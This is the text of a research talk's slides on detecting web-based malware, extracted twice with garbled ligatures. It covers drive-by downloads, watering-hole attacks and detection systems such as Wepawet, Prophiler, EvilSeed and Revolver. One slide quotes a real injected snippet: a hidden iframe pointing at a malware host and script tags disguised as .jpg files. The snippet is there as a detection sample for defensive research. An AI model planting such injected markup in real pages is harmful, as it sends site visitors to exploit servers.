Chasing	
  web-­‐based	
  malware	
  
Marco	
  Cova	
  
marco@lastline.com	
  
Who	
  am	
  I?	
  
•  Lecturer	
  in	
  Computer	
  Security	
  at	
  the	
  
University	
  of	
  Birmingham,	
  UK	
  
•  Member	
  of	
  the	
  founding	
  team	
  of	
  Lastline,	
  Inc.	
  
•  Research	
  interests:	
  
– Malware	
  analysis	
  
– Vulnerability	
  analysis	
  
WEB	
  MALWARE	
  
Web-­‐based	
  malware	
  
evil.js	
  
GET	
  /	
  
<iframe>	
  
Malicious	
  code	
  
Exploit	
  
Social	
  Engineering	
  
Not	
  really	
  LinkedIn	
  
Social	
  Malware	
  
Blackhat	
  SEO	
  
Watering	
  Hole	
  AUacks	
  
•  SomeVmes	
  it	
  is	
  difficult	
  to	
  
exploit	
  the	
  target	
  of	
  an	
  aUack	
  
directly	
  
–  Instead	
  compromise	
  a	
  site	
  that	
  
is	
  likely	
  to	
  be	
  visited	
  by	
  the	
  
target	
  
•  Council	
  on	
  foreign	
  relaVons	
  
→	
  governmental	
  officials	
  
•  Unaligned	
  Chinese	
  news	
  site	
  
→	
  Chinese	
  dissidents	
  
•  iPhone	
  dev	
  web	
  site	
  	
  
→	
  developers	
  at	
  Apple,	
  
Facebook,	
  TwiUer,	
  etc.	
  
•  NaVon	
  Journal	
  web	
  site	
  	
  
→	
  PoliVcal	
  insiders	
  in	
  
Washington	
  
CHASING	
  WEB	
  MALWARE	
  
Oracles,	
  Filters,	
  Seeders,	
  AnV	
  Evasions	
  
Oracle	
  	
  
•  EssenVally,	
  a	
  classificaVon	
  algorithm	
  for	
  web	
  
content	
  
– Input:	
  web	
  page	
  
– Output:	
  classificaVon	
  (malicious	
  or	
  benign)	
  
•  In	
  pracVce,	
  it	
  is	
  useful	
  to	
  extract	
  and	
  provide	
  
users	
  with	
  evidence	
  to	
  support	
  classificaVon	
  
– Exploit	
  detecVon	
  
– DeobfuscaVon	
  results	
  
– Anything	
  that	
  helps	
  forensics,	
  really	
  
Oracle	
  approaches	
  
•  Nowadays,	
  most	
  oracles	
  are	
  dynamic	
  analysis	
  
systems	
  
–  We	
  care	
  about	
  the	
  behavior	
  of	
  a	
  sample/web	
  page/
document	
  
•  Run	
  a	
  sample/visit	
  a	
  web	
  page	
  inside	
  an	
  
instrumented	
  environment	
  and	
  monitor	
  its	
  
behavior	
  
•  Bypass	
  all	
  obfuscaVon/feasibility	
  concerns	
  
associated	
  with	
  staVc	
  analysis	
  
•  Opens	
  up	
  a	
  lot	
  of	
  interesVng	
  challenges	
  related	
  to	
  
transparency	
  and	
  evasion	
  
Wepawet	
  
•  Detec3on	
  and	
  Analysis	
  of	
  Drive-­‐by-­‐Download	
  ABacks	
  and	
  
Malicious	
  JavaScript	
  Code	
  
Marco	
  Cova,	
  Christopher	
  Kruegel,	
  Giovanni	
  Vigna	
  in	
  
Proceedings	
  of	
  the	
  World	
  Wide	
  Web	
  Conference	
  (WWW),	
  
Raleigh,	
  NC,	
  April	
  2010	
  
•  hUp://wepawet.cs.ucsb.edu	
  	
  
•  By	
  the	
  numbers:	
  
–  Number	
  of	
  unique	
  IPs	
  that	
  submiUed	
  to	
  Wepawet:	
  
141,463	
  
–  Number	
  of	
  pages	
  visited	
  and	
  analyzed	
  by	
  Wepawet:	
  
67,424,459	
  
–  Number	
  of	
  malicious	
  pages	
  idenVfied	
  as	
  malicious:	
  
2,239,335	
  
Wepawet	
  Features	
  
•  Exploit	
  preparaVon	
  
–  Number	
  of	
  bytes	
  allocated	
  
(heap	
  spraying)	
  
–  Number	
  of	
  likely	
  shellcode	
  
strings	
  
•  Exploit	
  aUempt	
  
–  Number	
  of	
  instanVated	
  
plugins	
  and	
  AcVveX	
  
controls	
  
–  Values	
  of	
  aUributes	
  and	
  
parameters	
  in	
  method	
  calls	
  
–  Sequences	
  of	
  method	
  calls	
  
•  RedirecVons	
  and	
  cloaking	
  
–  Number	
  and	
  target	
  of	
  
redirecVons	
  
–  Browser	
  personality-­‐	
  and	
  
history-­‐based	
  differences	
  
•  ObfuscaVon	
  
–  String	
  definiVons/uses	
  
–  Number	
  of	
  dynamic	
  code	
  
execuVons	
  
–  Length	
  of	
  dynamically-­‐
executed	
  code	
  
Filter	
  
•  If	
  everything	
  goes	
  well,	
  amer	
  a	
  while	
  we	
  will	
  
have	
  more	
  samples/pages	
  than	
  you	
  can	
  
analyze	
  in-­‐depth	
  with	
  your	
  oracle	
  
•  Analysis	
  Vme	
  ranges	
  from	
  a	
  few	
  seconds	
  to	
  a	
  
couple	
  of	
  minutes	
  
– Oracle	
  actually	
  runs	
  the	
  sample	
  
– SomeVmes	
  mulVple	
  Vmes	
  (anV-­‐evasion	
  
techniques)	
  
•  Challenge:	
  how	
  do	
  we	
  scale?	
  
StaVc	
  filtering	
  
•  Quick	
  idenVficaVon	
  of	
  drive-­‐by-­‐download	
  web	
  
pages	
  
–  Each	
  web	
  page	
  is	
  deemed	
  likely	
  benign	
  or	
  likely	
  
malicious	
  
•  Basis	
  for	
  the	
  classificaVon	
  is	
  a	
  set	
  of	
  staVc	
  
features	
  
•  Necessarily	
  more	
  imprecise	
  than	
  oracle	
  
–  We	
  only	
  worry	
  about	
  not	
  having	
  false	
  negaVves	
  
–  Very	
  tolerant	
  with	
  false	
  posiVves	
  (consequence:	
  more	
  
work	
  for	
  our	
  oracle)	
  
Prophiler	
  
•  Filter	
  for	
  malicious	
  web	
  pages	
  
•  Prophiler:	
  a	
  Fast	
  Filter	
  for	
  the	
  Large-­‐Scale	
  
Detec3on	
  of	
  Malicious	
  Web	
  Pages,	
  
Davide	
  Canali,	
  Marco	
  Cova,	
  Christopher	
  
Kruegel,	
  Giovanni	
  Vigna	
  in	
  
Proceedings	
  of	
  the	
  Interna=onal	
  World	
  Wide	
  
Web	
  Conference	
  (WWW),	
  2011	
  
StaVc	
  features	
  
•  We	
  define	
  three	
  classes	
  of	
  features	
  (77	
  in	
  total)	
  
–  HTML	
  (19)	
  
•  source:	
  web	
  page	
  content	
  
–  JavaScript	
  (25)	
  
•  source:	
  web	
  page	
  content	
  
–  URL	
  and	
  host-­‐based	
  (33)	
  
•  source:	
  page	
  URL	
  and	
  URLs	
  included	
  in	
  the	
  content	
  
•  One	
  machine	
  learning	
  model	
  for	
  each	
  feature	
  
class	
  
Example	
  features	
  
HTML	
  features	
  
•  iframe	
  tags,	
  hidden	
  elements,	
  elements	
  with	
  a	
  
small	
  area,	
  script	
  elements,	
  embed	
  and	
  object	
  
tags,	
  scripts	
  with	
  a	
  wrong	
  filename	
  extension,	
  
out-­‐of-­‐place	
  elements,	
  included	
  URLs,	
  
scripVng	
  content	
  percentage,	
  whitespace	
  
percentage,	
  meta	
  refresh	
  tags,	
  double	
  HTML	
  
documents,	
  …	
  
Matches	
  
<div style="display:none">
<iframe src="http://biozavr.ru:8080/index.php" width=104 height=251 >
</iframe></div>	
<body><div	
  id="DivID">	
  	
  
	
  	
  <script	
  src='a2.jpg'></script>	
  
	
  	
  <script	
  src='b.jpg'></script>	
  
	
  	
  <script	
  src='url.jpg'></script>	
  
	
  	
  <script	
  src='c.jpg'></script>	
  
	
  	
  <script	
  src='d.jpg'></script>	
  
	
  	
  <script	
  src='e.jpg'></script>	
  
	
  	
  <script	
  src='f.jpg'></script>"
</body>	
  
EvaluaVon	
  
•  Large-­‐scale	
  evaluaVon	
  of	
  
Prophiler	
  
•  60	
  days	
  of	
  crawling	
  +	
  
analysis	
  
•  18,939,908	
  unlabeled	
  
pages	
  
•  14.3%	
  of	
  pages	
  flagged	
  as	
  
suspicious	
  and	
  submiUed	
  
to	
  Wepawet	
  (13.7%	
  FP)	
  
•  85.7%	
  load	
  reducVon	
  on	
  
Wepawet	
  =	
  saving	
  more	
  
than	
  400	
  days	
  of	
  analysis!	
  
Smart	
  crawler	
  
•  How	
  do	
  we	
  seed	
  our	
  oracle	
  +	
  filter	
  
•  Obvious	
  idea:	
  crawling	
  
– Problem:	
  toxicity	
  of	
  regular	
  crawling	
  is	
  preUy	
  low	
  
– ObservaVon:	
  crawling	
  only	
  as	
  good	
  as	
  the	
  iniVal	
  
seeds	
  
•  Challenge:	
  can	
  we	
  find	
  beUer	
  seeds?	
  
EvilSeed	
  
•  Guided	
  search	
  approach	
  to	
  increase	
  toxicity	
  of	
  
pages	
  that	
  are	
  crawled	
  
•  Inputs:	
  malicious	
  web	
  pages	
  found	
  in	
  the	
  past	
  
•  Output:	
  set	
  of	
  (more	
  likely	
  malicious)	
  web	
  pages	
  
•  EVILSEED:	
  A	
  Guided	
  Approach	
  to	
  Finding	
  
Malicious	
  Web	
  Pages,	
  Luca	
  Invernizzi,	
  Stefano	
  
BenvenuV,	
  Paolo	
  Milani,	
  Marco	
  Cova,	
  Christopher	
  
Kruegel,	
  Giovanni	
  Vigna,	
  in	
  Proceedings	
  of	
  the	
  
IEEE	
  Symposium	
  on	
  Security	
  and	
  Privacy,	
  2012	
  
Gadgets	
  
Gadgets	
  
•  Links	
  gadget	
  (malware	
  hub)	
  
•  Content	
  dorks	
  gadget	
  
•  SEO	
  gadget	
  
•  Domain	
  registraVon	
  gadget	
  
•  DNS	
  queries	
  gadget	
  
AnV	
  evasion	
  
•  At	
  this	
  point	
  of	
  the	
  story,	
  the	
  bad	
  guys	
  will	
  
acVvely	
  try	
  to	
  evade	
  your	
  system	
  
•  Lots	
  of	
  effort	
  in	
  designing	
  evasion	
  techniques	
  
– Analysis	
  environment	
  detecVon	
  
– User	
  detecVon	
  
– Stalling	
  
•  Challenge:	
  how	
  do	
  we	
  detect	
  if	
  we	
  are	
  being	
  
evaded?	
  
Revolver	
  
•  AssumpVon:	
  aUackers	
  are	
  likely	
  to	
  take	
  
exisVng	
  malicious	
  samples/web	
  pages	
  and	
  
enhance	
  them	
  to	
  add	
  evasive	
  code	
  
•  Idea:	
  detect	
  similar	
  samples	
  that	
  are	
  classified	
  
differently	
  by	
  the	
  oracle	
  
•  Revolver:	
  An	
  Automated	
  Approach	
  to	
  the	
  Detec3on	
  
of	
  Evasive	
  Web-­‐based	
  Malware	
  
A.	
  Kapravelos,	
  Y.	
  Shoshitaishvili,	
  M.	
  Cova,	
  C.	
  Kruegel,	
  
G.	
  Vigna	
  in	
  Proceedings	
  of	
  the	
  USENIX	
  Security	
  
Symposium	
  Washington,	
  D.C.	
  August	
  2013	
  
Revolver	
  
IF	
  
VAR	
   <=	
   NUM	
  
…	
  
Oracle	
  Web	
  
IF	
  
VAR	
   <=	
   NUM	
  
…	
  
Similarity	
  
computaVon	
   {bi,	
  mj}	
  
Malicious	
  evoluVon	
  
Data-­‐dependency	
  
JavaScript	
  infecVons	
  
Evasions	
  
Pages	
   ASTs	
   Candidate	
  
pairs	
  
…	
  
…	
  
Revolver	
  
Terms	
  
Extractor	
  
Malicious	
  
Pages	
  
Feature	
  
Extractor	
  
Public	
  
Portal	
  
Crawler	
  
C&C	
  Site	
  
Honeyclient	
  
Honeyclient	
  
Honeyclient	
  
Wepawet	
  
Cloud	
  
EvilSeed	
  
hUp://www.easymoney.com	
  
hUp://cheapfarma.ru	
  
hUp://rateyourcar.com	
  
hUp://nudecelebriVes.it	
  
Prophiler	
  
Benign	
  
Pages	
  
Possibly	
  
Malicious	
  
Pages	
  
Anubis	
  
Exploit	
  Site	
  
Malicious	
  
Pages	
  
Benign	
  
Pages	
  
Threat	
  
Intel	
  
Block	
  
Challenges	
  
•  Evasions	
  
– DetecVon	
  
– Bypass	
  (when	
  possible)	
  
•  Targeted	
  aUacks	
  
•  Defense/offense	
  imbalance	
  

Chasing web-based malware

  • 1.
    Chasing  web-­‐based  malware   Marco  Cova   marco@lastline.com  
  • 2.
    Who  am  I?   •  Lecturer  in  Computer  Security  at  the   University  of  Birmingham,  UK   •  Member  of  the  founding  team  of  Lastline,  Inc.   •  Research  interests:   – Malware  analysis   – Vulnerability  analysis  
  • 3.
  • 4.
    Web-­‐based  malware   evil.js   GET  /   <iframe>  
  • 5.
  • 6.
  • 7.
  • 8.
    Not  really  LinkedIn   Social  Malware  
  • 9.
  • 10.
    Watering  Hole  AUacks   •  SomeVmes  it  is  difficult  to   exploit  the  target  of  an  aUack   directly   –  Instead  compromise  a  site  that   is  likely  to  be  visited  by  the   target   •  Council  on  foreign  relaVons   →  governmental  officials   •  Unaligned  Chinese  news  site   →  Chinese  dissidents   •  iPhone  dev  web  site     →  developers  at  Apple,   Facebook,  TwiUer,  etc.   •  NaVon  Journal  web  site     →  PoliVcal  insiders  in   Washington  
  • 11.
    CHASING  WEB  MALWARE   Oracles,  Filters,  Seeders,  AnV  Evasions  
  • 12.
    Oracle     • EssenVally,  a  classificaVon  algorithm  for  web   content   – Input:  web  page   – Output:  classificaVon  (malicious  or  benign)   •  In  pracVce,  it  is  useful  to  extract  and  provide   users  with  evidence  to  support  classificaVon   – Exploit  detecVon   – DeobfuscaVon  results   – Anything  that  helps  forensics,  really  
  • 13.
    Oracle  approaches   • Nowadays,  most  oracles  are  dynamic  analysis   systems   –  We  care  about  the  behavior  of  a  sample/web  page/ document   •  Run  a  sample/visit  a  web  page  inside  an   instrumented  environment  and  monitor  its   behavior   •  Bypass  all  obfuscaVon/feasibility  concerns   associated  with  staVc  analysis   •  Opens  up  a  lot  of  interesVng  challenges  related  to   transparency  and  evasion  
  • 14.
    Wepawet   •  Detec3on  and  Analysis  of  Drive-­‐by-­‐Download  ABacks  and   Malicious  JavaScript  Code   Marco  Cova,  Christopher  Kruegel,  Giovanni  Vigna  in   Proceedings  of  the  World  Wide  Web  Conference  (WWW),   Raleigh,  NC,  April  2010   •  hUp://wepawet.cs.ucsb.edu     •  By  the  numbers:   –  Number  of  unique  IPs  that  submiUed  to  Wepawet:   141,463   –  Number  of  pages  visited  and  analyzed  by  Wepawet:   67,424,459   –  Number  of  malicious  pages  idenVfied  as  malicious:   2,239,335  
  • 15.
    Wepawet  Features   • Exploit  preparaVon   –  Number  of  bytes  allocated   (heap  spraying)   –  Number  of  likely  shellcode   strings   •  Exploit  aUempt   –  Number  of  instanVated   plugins  and  AcVveX   controls   –  Values  of  aUributes  and   parameters  in  method  calls   –  Sequences  of  method  calls   •  RedirecVons  and  cloaking   –  Number  and  target  of   redirecVons   –  Browser  personality-­‐  and   history-­‐based  differences   •  ObfuscaVon   –  String  definiVons/uses   –  Number  of  dynamic  code   execuVons   –  Length  of  dynamically-­‐ executed  code  
  • 16.
    Filter   •  If  everything  goes  well,  amer  a  while  we  will   have  more  samples/pages  than  you  can   analyze  in-­‐depth  with  your  oracle   •  Analysis  Vme  ranges  from  a  few  seconds  to  a   couple  of  minutes   – Oracle  actually  runs  the  sample   – SomeVmes  mulVple  Vmes  (anV-­‐evasion   techniques)   •  Challenge:  how  do  we  scale?  
  • 17.
    StaVc  filtering   • Quick  idenVficaVon  of  drive-­‐by-­‐download  web   pages   –  Each  web  page  is  deemed  likely  benign  or  likely   malicious   •  Basis  for  the  classificaVon  is  a  set  of  staVc   features   •  Necessarily  more  imprecise  than  oracle   –  We  only  worry  about  not  having  false  negaVves   –  Very  tolerant  with  false  posiVves  (consequence:  more   work  for  our  oracle)  
  • 18.
    Prophiler   •  Filter  for  malicious  web  pages   •  Prophiler:  a  Fast  Filter  for  the  Large-­‐Scale   Detec3on  of  Malicious  Web  Pages,   Davide  Canali,  Marco  Cova,  Christopher   Kruegel,  Giovanni  Vigna  in   Proceedings  of  the  Interna=onal  World  Wide   Web  Conference  (WWW),  2011  
  • 19.
    StaVc  features   • We  define  three  classes  of  features  (77  in  total)   –  HTML  (19)   •  source:  web  page  content   –  JavaScript  (25)   •  source:  web  page  content   –  URL  and  host-­‐based  (33)   •  source:  page  URL  and  URLs  included  in  the  content   •  One  machine  learning  model  for  each  feature   class  
  • 20.
    Example  features   HTML  features   •  iframe  tags,  hidden  elements,  elements  with  a   small  area,  script  elements,  embed  and  object   tags,  scripts  with  a  wrong  filename  extension,   out-­‐of-­‐place  elements,  included  URLs,   scripVng  content  percentage,  whitespace   percentage,  meta  refresh  tags,  double  HTML   documents,  …  
  • 21.
    Matches   <div style="display:none"> <iframesrc="http://biozavr.ru:8080/index.php" width=104 height=251 > </iframe></div> <body><div  id="DivID">        <script  src='a2.jpg'></script>      <script  src='b.jpg'></script>      <script  src='url.jpg'></script>      <script  src='c.jpg'></script>      <script  src='d.jpg'></script>      <script  src='e.jpg'></script>      <script  src='f.jpg'></script>" </body>  
  • 22.
    EvaluaVon   •  Large-­‐scale  evaluaVon  of   Prophiler   •  60  days  of  crawling  +   analysis   •  18,939,908  unlabeled   pages   •  14.3%  of  pages  flagged  as   suspicious  and  submiUed   to  Wepawet  (13.7%  FP)   •  85.7%  load  reducVon  on   Wepawet  =  saving  more   than  400  days  of  analysis!  
  • 23.
    Smart  crawler   • How  do  we  seed  our  oracle  +  filter   •  Obvious  idea:  crawling   – Problem:  toxicity  of  regular  crawling  is  preUy  low   – ObservaVon:  crawling  only  as  good  as  the  iniVal   seeds   •  Challenge:  can  we  find  beUer  seeds?  
  • 24.
    EvilSeed   •  Guided  search  approach  to  increase  toxicity  of   pages  that  are  crawled   •  Inputs:  malicious  web  pages  found  in  the  past   •  Output:  set  of  (more  likely  malicious)  web  pages   •  EVILSEED:  A  Guided  Approach  to  Finding   Malicious  Web  Pages,  Luca  Invernizzi,  Stefano   BenvenuV,  Paolo  Milani,  Marco  Cova,  Christopher   Kruegel,  Giovanni  Vigna,  in  Proceedings  of  the   IEEE  Symposium  on  Security  and  Privacy,  2012  
  • 25.
  • 26.
    Gadgets   •  Links  gadget  (malware  hub)   •  Content  dorks  gadget   •  SEO  gadget   •  Domain  registraVon  gadget   •  DNS  queries  gadget  
  • 27.
    AnV  evasion   • At  this  point  of  the  story,  the  bad  guys  will   acVvely  try  to  evade  your  system   •  Lots  of  effort  in  designing  evasion  techniques   – Analysis  environment  detecVon   – User  detecVon   – Stalling   •  Challenge:  how  do  we  detect  if  we  are  being   evaded?  
  • 28.
    Revolver   •  AssumpVon:  aUackers  are  likely  to  take   exisVng  malicious  samples/web  pages  and   enhance  them  to  add  evasive  code   •  Idea:  detect  similar  samples  that  are  classified   differently  by  the  oracle   •  Revolver:  An  Automated  Approach  to  the  Detec3on   of  Evasive  Web-­‐based  Malware   A.  Kapravelos,  Y.  Shoshitaishvili,  M.  Cova,  C.  Kruegel,   G.  Vigna  in  Proceedings  of  the  USENIX  Security   Symposium  Washington,  D.C.  August  2013  
  • 29.
    Revolver   IF   VAR   <=   NUM   …   Oracle  Web   IF   VAR   <=   NUM   …   Similarity   computaVon   {bi,  mj}   Malicious  evoluVon   Data-­‐dependency   JavaScript  infecVons   Evasions   Pages   ASTs   Candidate   pairs   …   …  
  • 30.
  • 31.
    Terms   Extractor   Malicious   Pages   Feature   Extractor   Public   Portal   Crawler   C&C  Site   Honeyclient   Honeyclient   Honeyclient   Wepawet   Cloud   EvilSeed   hUp://www.easymoney.com   hUp://cheapfarma.ru   hUp://rateyourcar.com   hUp://nudecelebriVes.it   Prophiler   Benign   Pages   Possibly   Malicious   Pages   Anubis   Exploit  Site   Malicious   Pages   Benign   Pages   Threat   Intel   Block  
  • 32.
    Challenges   •  Evasions   – DetecVon   – Bypass  (when  possible)   •  Targeted  aUacks   •  Defense/offense  imbalance